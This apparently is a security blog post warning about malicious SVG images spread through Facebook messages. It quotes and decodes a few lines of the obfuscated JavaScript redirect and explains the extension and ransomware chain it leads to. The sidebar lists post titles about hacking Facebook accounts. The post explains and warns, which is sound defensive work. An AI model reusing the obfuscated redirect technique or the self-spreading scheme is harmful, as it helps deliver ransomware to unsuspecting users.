Facebook SPAM Alert! A Malicious SVG File is Spreading through Facebook Messages

Have you received any kind of image file through Facebook messages lately? If yes, is it in SVG format? If it is, please don’t click on it.

Facebook Spam in messages

Spammers have crafted malicious images (SVG files) that will make you install ransomware on your system and, in turn, infect all of your friends through the same medium, i.e., Facebook messages.

Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.

The reason spammers choose to use SVG images for spam is that they allow dynamic content. Spammers had added malicious JavaScript code right inside the image itself, which in this case was a link to an external file that would, in turn, download Locky ransomware.

What would happen if you clicked on that spam image?

You can check out the SVG file code here:
http://pastebin.com/Ma5t0Fj0

If you look at the SVG file on Pastebin, observe lines 48 to 51

var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);

Spammers have cleverly used cryptographic techniques to bypass Facebook’s file checkers and then execute a window function.

If you log these variables in the console:

console.log(ljfji);
console.log(pryyb);
console.log(lpvxzt);
console.log(bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true));

You would get this:

top
location
href

Clearly, it appears that the malicious SVG file is attempting to redirect you to , which happens to be a fake YouTube video page that will force you to install a malicious Chrome extension.

Facebook SPAM in SVG file

When the extension gets installed, it will then take advantage of your browser’s access to your Facebook account to covertly spam your friends with the same SVG image file, helping this spam to spread more.

Furthermore, the extension also downloads Nemucod Downloader, which is a generic malware downloader generally used to fetch and install various ransomware. In this case, the malware downloader downloads Locky ransomware, leaving your system locked.

You can read more about ransomware in my previous post on Rise of malicious JavaScript.

Source: @peterkruse

Related posts:

  1. How to Find Out Who Made a Fake Facebook Account
  2. Facebook Profile Picture Viewer
  3. Getting IP Address from Facebook Messenger App
  4. Fake Facebook Account: How to Tell If a Facebook Profile Is Fake
  5. How to Track Location of Facebook User
  6. Get Facebook Hack Tool
  7. Facebook Phishing Email Examples
  8. How to Hack a Facebook Account
  9. Facebook: Invite All Your Friends to Like a Page

Ashwin S

A cybersecurity enthusiast at heart with a passion for all things tech. Yet his creativity extends beyond the world of cybersecurity. With an innate love for design, he's always on the lookout for unique design concepts.